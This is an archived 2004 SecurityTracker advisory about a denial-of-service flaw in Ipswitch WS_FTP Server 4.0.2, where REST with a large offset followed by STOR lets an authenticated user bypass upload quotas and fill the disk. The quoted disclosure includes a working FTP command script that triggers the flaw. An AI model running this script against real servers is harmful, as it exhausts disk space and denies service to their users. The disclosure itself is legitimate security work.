SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
WS_FTP Server REST File Pointer Error Lets Remote Authenticated Users Consume Disk Space
SecurityTracker Alert ID:  1009529
SecurityTracker URL:  http://securitytracker.com/id/1009529
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 23 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 4.0.2
Description:   A denial of service vulnerability was reported in WS_FTP Server. A remote authenticated user with FTP write access can cause the target service to consume all available disk space.

Hugh Mann reported that a remote authenticated user can send a REST command with a large value and then send a small file with the STOR command to create a file on the target system of up to 2^64-1 bytes. The report indicates that WS_FTP Server does not properly compute the user-supplied file pointer information.

A demonstration exploit is provided in the Source Message.

Impact:   A remote authenticated user with FTP write access can consume all available disk space on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/products/ws_ftp-server/index.html (Links to External Site)
Cause:   Input validation error, Resource error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] How to crash a harddisk - the Ipswitch WS_FTP Server way


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Advisory Name: How to crash a harddisk - the Ipswitch WS_FTP Server way
Impact       : Denial of Service
Discovered by: Hugh Mann hughmann@hotmail.com
Tested progs : Ipswitch WS_FTP Server 4.0.2.EVAL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Description
~~~~~~~~~~~
It's possible for any user with write access to a directory, even when 
there's a limit to how much data the user can upload, to use up all 
available disk space on any partition it can upload to. Even a slow modem 
user can do this because the user only needs to send a few bytes to the 
server.

Details
~~~~~~~
The REST command is used to change the file pointer where new data will be 
written to the file next time the user sends an upload command such as STOR. 
A user can create arbitrary sized files (up to 2^64-1 bytes) by specifying a 
large value as the argument to REST and then sending a small file with STOR.

WS_FTP Server doesn't count the extra bytes starting from the end of the 
original file to the new file pointer location when checking if the user can 
upload more bytes. The next time the user tries to upload a file, WS_FTP 
Server will give an error.

Exploit
~~~~~~~
Save this in a file called ftpcmds.txt, after changing the FTP server name, 
username, and password.

<<<<<<<<<<<<
open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit
>>>>>>>>>>>>

Then start it:

C:\>ftp -s:ftpcmds.txt

to see the result. It will create a 1GB file and then delete it.

_________________________________________________________________
Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC